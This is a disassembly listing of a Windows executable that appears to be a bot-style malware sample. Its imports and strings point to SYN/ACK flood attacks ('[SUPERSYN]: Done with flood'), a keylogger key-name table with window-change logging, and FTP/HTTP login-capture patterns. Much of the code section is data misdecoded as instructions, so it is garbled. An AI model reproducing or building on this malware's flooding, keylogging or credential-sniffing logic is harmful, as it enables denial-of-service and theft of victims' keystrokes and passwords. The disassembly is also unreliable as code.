db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 16h
db 2, 48h, 65h
aApfree db 'apFree',0
align 10h
db 10h
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 0A3h ;
db 1, 47h, 65h
aTprocessheap db 'tProcessHeap',0
align 2
dw 389h
aVirtualqueryex db 'VirtualQueryEx',0
align 10h
db 0B8h ;
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
db 0C5h ;
db 1, 47h, 65h
aTsysteminfo db 'tSystemInfo',0
db 86h ;
db 2, 4Fh, 70h
aEnprocess db 'enProcess',0
dw 17Fh
aGetmodulehan_0 db 'GetModuleHandleA',0
align 2
dw 0F3h
aFormatmessag_0 db 'FormatMessageA',0
align 4
db 0Ah
db 2, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 4
db 3
db 2, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 371h
aUnmapviewoff_0 db 'UnmapViewOfFile',0
db 68h ; h
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aT db 'T',0
aCreatefilema_1 db 'CreateFileMappingA',0
align 2
dw 31Fh
aSetfiletime db 'SetFileTime',0
db 65h ; e
db 1, 47h, 65h
aTfiletime db 'tFileTime',0
aF db 'f',0
aCreateproces_0 db 'CreateProcessA',0
align 4
db '',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
db 19h
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 1D5h
aGettemppatha_0 db 'GetTempPathA',0
align 2
dw 15Ah
aGetexitcodep_0 db 'GetExitCodeProcess',0
align 4
dd 65500291h, 614E6B65h, 5064656Dh, 657069h, 75440093h
dd 63696C70h, 48657461h, 6C646E61h, 1420065h
aGetcurrentpr_1 db 'GetCurrentProcess',0
aE db 'e',0
aCreatepipe db 'CreatePipe',0
align 4
db 0E9h ;
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 4
db 2, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
db '',0
aExitprocess_0 db 'ExitProcess',0
db 94h ;
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 275h
aMultibytetow_0 db 'MultiByteToWideChar',0
dd 65470114h, 6D6F4374h, 65747570h, 6D614E72h, 4165h, 65440083h
dd 6574656Ch, 656C6946h, 1430041h
aGetcurrentpr_2 db 'GetCurrentProcessId',0
aC db 'C',0
aCopyfilea db 'CopyFileA',0
db 90h
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 35Fh
aTerminatethrea db 'TerminateThread',0
db 6Eh ; n
db 2, 4Dh, 6Fh
aVefilea db 'veFileA',0
db 5Eh ; ^
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 0EEh ;
db 2, 53h, 65h
aTconsolectrlha db 'tConsoleCtrlHandler',0
dd 65470174h, 636F4C74h, 49656C61h, 416F666Eh, 1780000h
dd 4C746547h, 6369676Fh, 72446C61h, 73657669h, 38E0000h
aWaitformultipl db 'WaitForMultipleObjects',0
align 4
db 0FCh ;
align 2
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 4
db 0D7h ;
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 0E2h ;
db 1, 47h, 65h
aTtimezoneinfor db 'tTimeZoneInformation',0
align 2
dw 1C8h
aGetsystemtime db 'GetSystemTime',0
dw 21Ah
aHeaprealloc db 'HeapReAlloc',0
dd 654701B7h, 61745374h, 70757472h, 6F666E49h, 1100041h
dd 43746547h, 616D6D6Fh, 694C646Eh, 41656Eh, 654701E8h
dd 72655674h, 6E6F6973h, 1580000h
aGetenvironme_0 db 'GetEnvironmentVariableA',0
dd 65480214h, 65447061h, 6F727473h, 2120079h, 70616548h
dd 61657243h, 6574h, 69560383h, 61757472h, 6572466Ch, 3810065h
dd 74726956h, 416C6175h, 636F6C6Ch, 2360000h, 61427349h
dd 69725764h, 74506574h, 2A70072h, 73696152h, 63784565h
dd 69747065h, 6E6Fh, 6548021Ch, 69537061h, 657Ah, 434C0244h
dd 5370614Dh, 6E697274h, 4167h, 434C0245h, 5370614Dh, 6E697274h
dd 5767h, 65470104h, 49504374h, 6F666Eh, 654700FDh, 50434174h
dd 1930000h, 4F746547h, 50434D45h, 36E0000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
dw 0F6h
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 0F7h ;
align 2
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 155h
aGetenvironme_1 db 'GetEnvironmentStrings',0
dw 157h
aGetenvironme_2 db 'GetEnvironmentStringsW',0
align 4
db 24h ; $
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 1B9h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 166h
aGetfiletype db 'GetFileType',0
db 0BAh ;
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1BDh
aGetstringtypew db 'GetStringTypeW',0
align 4
db 37h ; 7
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
aU db '',0
aFlushfilebuf_0 db 'FlushFileBuffers',0
align 4
db 4Ah ; J
db 3, 53h, 65h
aTunhandledexce db 'tUnhandledExceptionFilter',0
dw 233h
aIsbadreadptr db 'IsBadReadPtr',0
align 2
dw 230h
aIsbadcodeptr db 'IsBadCodePtr',0
align 2
dw 310h
aSetendoffile db 'SetEndOfFile',0
align 2
db ':',0
aComparestringa db 'CompareStringA',0
align 4
db ';',0
aComparestringw db 'CompareStringW',0
align 2
dw 313h
aSetenvironme_0 db 'SetEnvironmentVariableA',0
aKernel32_dll_0 db 'KERNEL32.dll',0
db 0
_1 ends
; Section 3. (virtual address 00024000)
; Virtual size : 000A6720 ( 681760.)
; Section size in file : 000A6720 ( 681760.)
; Offset to raw data for section: 00024000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_2 segment para public 'CODE' use32
assume cs:_2
;org 424000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_424000 dd 0 ; DATA XREF: sub_417BD8+1F�o
dd offset sub_4039F9
dword_424008 dd 0 ; DATA XREF: sub_417BD8+1A�o
dword_42400C dd 0 ; DATA XREF: sub_417BD8+10�o
dd offset sub_416832
; ---------------------------------------------------------------------------
adc esi, ecx
inc ecx
add [edx-25h], ah
inc ecx
add ah, dl
loc_42401D: ; DATA XREF: sub_417BD8:loc_417BE3�o
jmp loc_424063
; ---------------------------------------------------------------------------
align 4
dword_424024 dd 0 ; DATA XREF: sub_417C27+65�o
dd offset loc_41DC07
dword_42402C dd 0 ; DATA XREF: sub_417C27:loc_417C87�o
dword_424030 dd 0 ; DATA XREF: sub_417C27+76�o
dd offset loc_41E9E5
dword_424038 dd 2 dup(0) ; DATA XREF: sub_417C27:loc_417C98�o
dword_424040 dd 7A026E02h, 201F6D1Fh, 6F646428h, 1F702E73h, 29671F6Ch
; DATA XREF: sub_401000+5E�o
dd 0BBBB0220h, 44202002h, 20656E6Fh
db 77h, 69h, 74h
; ---------------------------------------------------------------------------
loc_424063: ; CODE XREF: _2:loc_42401D�j
push 6F6C6620h
outsd
and fs:[eax], ch
and eax, 2F424B69h
jnb short loc_4240D8
arpl [ecx], bp
add cs:[eax], al
loc_424078: ; DATA XREF: sub_4010B5+302�o
add ch, [esi+2]
jp short loc_42409C
insd
pop ds
and [eax], ch
db 64h
outs dx, dword ptr fs:[esi]
jnb short near ptr loc_4240B3+1
jo short loc_4240A7
insb
pop ds
sub [bx+si], esp
add bh, [ebx+202002BBh]
push ebx
outs dx, byte ptr gs:[esi]
and fs:[ebp+72h], ah
jb short near ptr loc_42410A+1
loc_42409C: ; CODE XREF: _2:0042407B�j
jb short loc_4240D8
and ds:2E3E64h, bh
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4240A7: ; CODE XREF: _2:00424086�j
; DATA XREF: sub_4010B5:loc_4011E1�o ...
add [esp+6Fh], ah
jnb short near ptr loc_4240DA+1
jb short loc_424110
outsb
outs dx, dword ptr fs:[esi]
insd
loc_4240B3: ; CODE XREF: _2:00424084�j
; DATA XREF: sub_4010B5:loc_4011C5�o ...
add [esp+6Fh], ah
jnb short loc_4240E7
popa
arpl [ebx+0], bp
; ---------------------------------------------------------------------------
db 3 dup(0)
dword_4240C0 dd 736F6464h, 6E79732Eh, 0 ; DATA XREF: sub_4010B5+F1�o
; sub_40D2E0+2661�o
dword_4240CC dd 7A026E02h, 201F6D1Fh, 6D636928h ; DATA XREF: sub_40144A+397�o
; ---------------------------------------------------------------------------
loc_4240D8: ; CODE XREF: _2:00424071�j
; _2:loc_42409C�j
jo short loc_424108
loc_4240DA: ; CODE XREF: _2:004240AB�j
jo short near ptr loc_4240F8+3
insb
pop ds
sub [bx+si], esp
add bh, [ebx+202002BBh]
loc_4240E7: ; CODE XREF: _2:004240B7�j
inc esp
outsd
outsb
and gs:[edi+69h], dh
jz short loc_424158
and ds:6C662073h, ah
outsd
outsd
loc_4240F8: ; CODE XREF: _2:loc_4240DA�j
and fs:[edi+ebp*2+20h], dh
dec ecx
push eax
cmp ah, [eax]
and eax, 53202E73h
outs dx, byte ptr gs:[esi]
loc_424108: ; CODE XREF: _2:loc_4240D8�j
jz short near ptr loc_424141+3
loc_42410A: ; CODE XREF: _2:0042409A�j
and ds:61702064h, ah
loc_424110: ; CODE XREF: _2:004240AD�j
arpl [ebx+65h], bp
jz short loc_42413D
jnb short near ptr loc_42413E+2
and [eax+20h], al
and eax, 2F424B64h
jnb short loc_424186
arpl [eax], sp
sub ds:29424D64h, ah
add cs:[eax], al
loc_42412C: ; DATA XREF: sub_40144A+307�o
add ch, [esi+2]
jp short loc_424150
insd
pop ds
and [eax], ch
imul esp, [ebx+6Dh], 1F702E70h
insb
loc_42413D: ; CODE XREF: _2:00424113�j
pop ds
loc_42413E: ; CODE XREF: _2:00424115�j
sub [bx+si], esp
loc_424141: ; CODE XREF: _2:loc_424108�j
add bh, [ebx+202002BBh]
inc ebp
jb short near ptr loc_4241BB+1
outsd
jb short loc_42416D
jnb short loc_4241B4
outsb
loc_424150: ; CODE XREF: _2:0042412F�j
imul ebp, fs:[esi+67h], 63617020h
loc_424158: ; CODE XREF: _2:004240EE�j
imul esp, [ebp+74h], 73h
and [edi+ebp*2+20h], dh
dec ecx
push eax
cmp ah, [eax]
and eax, 50202E73h
popa
arpl [ebx+65h], bp
loc_42416D: ; CODE XREF: _2:0042414B�j
jz short loc_4241E2
and [ebx+65h], dh
outsb
jz short near ptr loc_4241AC+3
and ds:52202E64h, ah
db 65h
jz short near ptr loc_4241ED+6
jb short near ptr loc_4241ED+1
db 65h
cmp ah, fs:[eax]
cmp al, 25h
loc_424186: ; CODE XREF: _2:0042411F�j
db 64h, 3Eh
add cs:[eax], al
loc_42418B: ; DATA XREF: sub_40144A+12A�o
add [edx], al
outsb
add bh, [edx+1Fh]
insd
pop ds
and [eax], ch
imul esp, [ebx+6Dh], 1F702E70h
insb
pop ds
sub [bx+si], esp
add bh, [ebx+202002BBh]
dec ecx
outsb
jbe short near ptr loc_42420B+1
insb
loc_4241AC: ; CODE XREF: _2:00424173�j
imul esp, [eax+74h], 65677261h
loc_4241B4: ; CODE XREF: _2:0042414D�j
jz short near ptr loc_4241D1+5
dec ecx
push eax
add cs:[eax], al
loc_4241BB: ; CODE XREF: _2:00424148�j
; DATA XREF: sub_40144A+C2�o
add [edx], al
outsb
add bh, [edx+1Fh]
insd
pop ds
and [eax], ch
imul esp, [ebx+6Dh], 1F702E70h
insb
pop ds
sub [bx+si], esp
loc_4241D1: ; CODE XREF: _2:loc_4241B4�j
add bh, [ebx+202002BBh]
inc ebp
jb short near ptr aSupersynDoneWi+4
outsd
jb short near ptr loc_424216+1
and [ebx+65h], dh
jz short near ptr aSupersynDoneWi+0Dh
loc_4241E2: ; CODE XREF: _2:loc_42416D�j
outsd
arpl [ebx+6Fh], bp
jo short near ptr aSupersynDoneWi+14h
sub [ecx], ch
and [esi+61h], ah
loc_4241ED: ; CODE XREF: _2:0042417E�j _2:0042417B�j
imul ebp, [ebp+64h], 6572202Ch
jz short near ptr aSupersynDoneWi+24h
jb short near ptr aSupersynDoneWi+1Fh
db 65h
cmp ah, fs:[eax]
cmp al, 25h
db 64h, 3Eh
add cs:[eax], al
loc_424204: ; DATA XREF: sub_40144A+49�o
add ch, [esi+2]
jp short loc_424228
insd
pop ds
loc_42420B: ; CODE XREF: _2:004241A9�j
and [eax], ch
imul esp, [ebx+6Dh], 1F702E70h
insb
pop ds
loc_424216: ; CODE XREF: _2:004241DB�j
sub [bx+si], esp
add bh, [ebx+202002BBh]
inc ebp
jb short loc_424294
outsd
jb short near ptr aSupersynDoneWi+17h
and [ebx+6Fh], dh
loc_424228: ; CODE XREF: _2:00424207�j
arpl [ebx+65h], bp
jz short near ptr aSupersynDoneWi+0Dh
sub [eax], esp
popaw
imul ebp, [ebp+64h], 6572202Ch
jz short near ptr loc_4242AF+1
jb short near ptr loc_4242AA+1
db 65h
cmp ah, fs:[eax]
cmp al, 25h
db 64h, 3Eh
add cs:[eax], al
; ---------------------------------------------------------------------------
aSupersynDoneWi db '[SUPERSYN]: Done with flood (%iKB/sec)',0 ; CODE XREF: _2:004241D8�j
; _2:004241E0�j ...
align 10h
dword_424270 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_4019D7+4B�o
dd 2BBBB02h, 6F442020h, 7720656Eh, 20687469h
; ---------------------------------------------------------------------------
loc_424294: ; CODE XREF: _2:00424220�j
db 66h
insb
outsd
outsd
and fs:[eax], ch
and eax, 2F424B69h
jnb short near ptr loc_424306+1
arpl [ecx], bp
add cs:[eax], al
loc_4242A7: ; DATA XREF: sub_401A76+27D�o
add [edx], al
outsb
loc_4242AA: ; CODE XREF: _2:0042423B�j
add bh, [edx+1Fh]
insd
pop ds
loc_4242AF: ; CODE XREF: _2:00424239�j
and [eax], ch
jnb short near ptr loc_42432A+2
outsb
db 2Eh
jo short near ptr loc_4242D4+2
insb
pop ds
sub [bx+si], esp
add bh, [ebx+202002BBh]
push ebx
outs dx, byte ptr gs:[esi]
and fs:[ebp+72h], ah
jb short loc_42433A
jb short near ptr loc_424306+1
and ds:2E3E64h, bh
loc_4242D4: ; CODE XREF: _2:004242B4�j
; DATA XREF: sub_401D82+4EB�o
add ch, [esi+2]
jp short near ptr loc_4242F7+1
insd
pop ds
and [eax], ch
jz short near ptr loc_424341+1
jo short loc_42430F
jo short near ptr loc_4242FF+3
insb
pop ds
sub [bx+si], esp
add bh, [ebx+202002BBh]
inc esp
outsd
outsb
and gs:[edi+69h], dh
jz short loc_42435F
loc_4242F7: ; CODE XREF: _2:004242D7�j
and ds:6C662073h, ah
outsd
outsd
loc_4242FF: ; CODE XREF: _2:004242E1�j
and fs:[edi+ebp*2+20h], dh
dec ecx
push eax
loc_424306: ; CODE XREF: _2:004242A0�j _2:004242CB�j
cmp ah, [eax]
and eax, 53202E73h
outs dx, byte ptr gs:[esi]
loc_42430F: ; CODE XREF: _2:004242DF�j
jz short near ptr loc_424348+3
and ds:61702064h, ah
arpl [ebx+65h], bp
jz short loc_424344
jnb short near ptr loc_424345+2
and [eax+20h], al
and eax, 2F424B64h
jnb short loc_42438D
arpl [eax], sp
loc_42432A: ; CODE XREF: _2:004242B1�j
sub ds:29424D64h, ah
add cs:[eax], al
loc_424333: ; DATA XREF: sub_401D82+44F�o
add [edx], al
outsb
add bh, [edx+1Fh]
insd
loc_42433A: ; CODE XREF: _2:004242C9�j
pop ds
and [eax], ch
jz short near ptr aSyn+2
jo short near ptr loc_42436B+4
loc_424341: ; CODE XREF: _2:004242DD�j
jo short near ptr loc_42435F+3
insb
loc_424344: ; CODE XREF: _2:0042431A�j
pop ds
loc_424345: ; CODE XREF: _2:0042431C�j
sub [bx+si], esp
loc_424348: ; CODE XREF: _2:loc_42430F�j
add bh, [ebx+202002BBh]
inc ebp
jb short loc_4243C3
outsd
jb short loc_424374
jnb short near ptr loc_4243B8+3
outsb
imul ebp, fs:[esi+67h], 63617020h
loc_42435F: ; CODE XREF: _2:004242F5�j
; _2:loc_424341�j
imul esp, [ebp+74h], 73h
and [edi+ebp*2+20h], dh
dec ecx
push eax
cmp ah, [eax]
loc_42436B: ; CODE XREF: _2:0042433F�j
and eax, 50202E73h
popa
arpl [ebx+65h], bp
loc_424374: ; CODE XREF: _2:00424352�j
jz short loc_4243E9
and [ebx+65h], dh
outsb
jz short loc_4243B6
and ds:52202E64h, ah
db 65h
jz short loc_4243FA
jb short near ptr loc_4243F4+1
db 65h
cmp ah, fs:[eax]
cmp al, 25h
loc_42438D: ; CODE XREF: _2:00424326�j
db 64h, 3Eh
add cs:[eax], al
; ---------------------------------------------------------------------------
dw 0
aRandom db 'random',0 ; DATA XREF: sub_401D82+312�o
; sub_40D2E0+2C3C�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_401D82+2F2�o
; sub_40D2E0+2C25�o
aSyn db 'syn',0 ; CODE XREF: _2:0042433D�j
; DATA XREF: sub_401D82+2D2�o ...
dword_4243A4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh ; DATA XREF: sub_401D82+15F�o
db 1Fh, 67h
; ---------------------------------------------------------------------------
loc_4243B6: ; CODE XREF: _2:0042437A�j
sub [eax], esp
loc_4243B8: ; CODE XREF: _2:00424354�j
add bh, [ebx+202002BBh]
dec ecx
outsb
jbe short loc_424423
insb
loc_4243C3: ; CODE XREF: _2:0042434F�j
imul esp, [eax+74h], 65677261h
jz short near ptr loc_4243E9+4
dec ecx
push eax
add cs:[eax], al
; ---------------------------------------------------------------------------
dw 0
dword_4243D4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+EE�o
db 2
; ---------------------------------------------------------------------------
loc_4243E9: ; CODE XREF: _2:loc_424374�j
; _2:004243CB�j
mov ebx, 202002BBh
inc ebp
jb short loc_424463
outsd
jb short near ptr loc_42442D+1
loc_4243F4: ; CODE XREF: _2:00424385�j
and [ebx+65h], dh
jz short near ptr dword_42446C
outsd
loc_4243FA: ; CODE XREF: _2:00424382�j
arpl [ebx+6Fh], bp
jo short loc_424473
sub [ecx], ch
and [esi+61h], ah
imul ebp, [ebp+64h], 6572202Ch
jz short near ptr byte_424483
jb short loc_42447E
db 65h
cmp ah, fs:[eax]
cmp al, 25h
db 64h, 3Eh
add cs:[eax], al
loc_42441B: ; DATA XREF: sub_401D82+70�o
add [edx], al
outsb
add bh, [edx+1Fh]
insd
pop ds
loc_424423: ; CODE XREF: _2:004243C0�j
and [eax], ch
jz short near ptr word_42448A
jo short near ptr loc_424454+3
jo short near ptr loc_424448+2
insb
pop ds
loc_42442D: ; CODE XREF: _2:004243F2�j
sub [bx+si], esp
add bh, [ebx+202002BBh]
inc ebp
jb short near ptr byte_4244AB
outsd
jb short near ptr loc_424473+3
and [ebx+6Fh], dh
arpl [ebx+65h], bp
jz short near ptr dword_42446C
sub [eax], esp
popaw
loc_424448: ; CODE XREF: _2:00424429�j
imul ebp, [ebp+64h], 6572202Ch
jz short loc_4244C7
jb short near ptr word_4244C2
loc_424454: ; CODE XREF: _2:00424427�j
db 65h
cmp ah, fs:[eax]
cmp al, 25h
db 64h, 3Eh
add cs:[eax], al
add [eax], cl
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_424463: ; CODE XREF: _2:004243EF�j
; DATA XREF: sub_4023A7:loc_40248A�o
add [edx+0], ah
; ---------------------------------------------------------------------------
dw 0
dd 62000000h
dword_42446C dd 0 ; CODE XREF: _2:004243F7�j _2:00424442�j
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_424473: ; CODE XREF: _2:004243FD�j _2:0042443A�j
add ds:65000000h, cl
; ---------------------------------------------------------------------------
db 3 dup(0)
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_42447E: ; CODE XREF: _2:0042440E�j
add [ebp+0], ah
; ---------------------------------------------------------------------------
db 2 dup(0)
byte_424483 db 0 ; CODE XREF: _2:0042440C�j
align 8
db 1Bh, 0
word_42448A dw 0 ; CODE XREF: _2:00424425�j
dd 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h
db 46h, 31h, 5Dh
byte_4244AB db 0 ; CODE XREF: _2:00424437�j
align 10h
dd 71h, 5D32465Bh, 5B000000h, 5D3246h
db 2 dup(0)
word_4244C2 dw 0 ; CODE XREF: _2:00424452�j
db 72h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_4244C7: ; CODE XREF: _2:00424450�j
add [ebx+46h], bl
xor ebx, [ebp+0]
; ---------------------------------------------------------------------------
db 2 dup(0), 5Bh
dd 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_424B94 dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_4023A7+2B6�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_424BCC dd 7A026E02h, 201F6D1Fh, 79656B28h, 2E676F6Ch, 1F6C1F70h
; DATA XREF: sub_4022C6+AE�o
dd 2202967h, 2002BBBBh, 732520h
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_4022C6+88�o
align 4
aAb db 'ab',0 ; DATA XREF: sub_4022C6+4E�o
; sub_40D2E0+2AE5�o
align 4
asc_424C0C: ; DATA XREF: sub_4022C6+2C�o
unicode 0, <\>,0
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_4023A7+228�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_4023A7+1E5�o
align 4
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_4023A7+8F�o
align 4
off_424C58 dd offset dword_4254D0 ; DATA XREF: sub_402688+29E�r
dd offset off_4254CC
dd offset aFtp ; "FTP"
dd offset aHttp ; "HTTP"
dword_424C68 dd 6F6C2E3Ah, 6E6967h, 3 dup(0) ; DATA XREF: sub_402688+1DE�o
dword_424C7C dd 0 ; DATA XREF: sub_402688+297�r
dd 6F6C2C3Ah, 6E6967h, 4 dup(0)
dd 6F6C213Ah, 6E6967h, 4 dup(0)
dd 6F6C403Ah, 6E6967h, 4 dup(0)
dd 6F6C243Ah, 6E6967h, 4 dup(0)
dd 6F6C253Ah, 6E6967h, 4 dup(0)
dd 6F6C5E3Ah, 6E6967h, 4 dup(0)
dd 6F6C263Ah, 6E6967h, 4 dup(0)
dd 6F6C2A3Ah, 6E6967h, 4 dup(0)
dd 6F6C2D3Ah, 6E6967h, 4 dup(0)
dd 6F6C2B3Ah, 6E6967h, 4 dup(0)
dd 6F6C2F3Ah, 6E6967h, 4 dup(0)
dd 6F6C5C3Ah, 6E6967h, 4 dup(0)
dd 6F6C3D3Ah, 6E6967h, 4 dup(0)
dd 6F6C3F3Ah, 6E6967h, 4 dup(0)
dd 6F6C273Ah, 6E6967h, 4 dup(0)
dd 6F6C603Ah, 6E6967h, 4 dup(0)
dd 6F6C7E3Ah, 6E6967h, 4 dup(0)
dd 6F6C203Ah, 6E6967h, 4 dup(0)
dd 75612E3Ah, 6874h, 4 dup(0)
dd 75612C3Ah, 6874h, 4 dup(0)
dd 7561213Ah, 6874h, 4 dup(0)
dd 7561403Ah, 6874h, 4 dup(0)
dd 7561243Ah, 6874h, 4 dup(0)
dd 7561253Ah, 6874h, 4 dup(0)
dd 75615E3Ah, 6874h, 4 dup(0)
dd 7561263Ah, 6874h, 4 dup(0)
dd 75612A3Ah, 6874h, 4 dup(0)
dd 75612D3Ah, 6874h, 4 dup(0)
dd 75612B3Ah, 6874h, 4 dup(0)
dd 75612F3Ah, 6874h, 4 dup(0)
dd 75615C3Ah, 6874h, 4 dup(0)
dd 75613D3Ah, 6874h, 4 dup(0)
dd 75613F3Ah, 6874h, 4 dup(0)
dd 7561273Ah, 6874h, 4 dup(0)
dd 7561603Ah, 6874h, 4 dup(0)
dd 75617E3Ah, 6874h, 4 dup(0)
dd 7561203Ah, 6874h, 4 dup(0)
dd 64692E3Ah, 5 dup(0)
dd 64692C3Ah, 5 dup(0)
dd 6469213Ah, 5 dup(0)
dd 6469403Ah, 5 dup(0)
dd 6469243Ah, 5 dup(0)
dd 6469253Ah, 5 dup(0)
dd 64695E3Ah, 5 dup(0)
dd 6469263Ah, 5 dup(0)
dd 64692A3Ah, 5 dup(0)
